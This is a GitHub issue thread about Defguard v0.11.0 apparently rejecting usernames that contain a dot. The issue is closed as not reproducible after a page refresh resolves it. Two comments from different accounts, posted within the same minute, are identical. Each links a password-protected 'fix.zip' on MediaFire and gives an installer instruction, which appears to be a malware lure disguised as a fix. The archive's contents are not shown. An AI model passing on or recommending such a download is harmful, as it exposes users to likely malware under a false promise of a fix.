### ISSUE TITLE
Cant create use with . in the username

### ISSUE THREAD

**Issue by t4ov** [DefGuard/defguard#744] opened 2024-08-26 07:19 UTC
**Describe the bug**
All our users created inside Defguard follows this pattern: Firstname.Lastname and upgrading to 0.11.0, i can't create user in this format.

**To Reproduce**

1. Upgrade to 0.11.0
2. Login to defgurad
3. Go to users
4. Add user and fill username: firstname.lastname

**Expected behavior**
Allow to create user with . in the username

**Version information**
- Defguard Core version: v0.11.0
 - Your browser and version [e.g. chrome 99, safari]: Edge

**Screenshots**
![Screenshot 2024-08-26 at 10 16 30](https://github.com/user-attachments/assets/780acc40-7952-4746-bc50-d28109403795)

**Additional context**

**Comment by Wanderx13** [comment] 2024-08-26 07:19
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment] 2024-08-26 07:19
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by t4ov** [comment] 2024-08-26 07:23
refresh the page and it was no longer complaining about the username so that's weird.

**Comment by teon** [comment] 2024-08-28 14:34
Can't reproduce. Closing.

**Closed by teon** 2024-08-28 14:34 UTC
Labels: bug
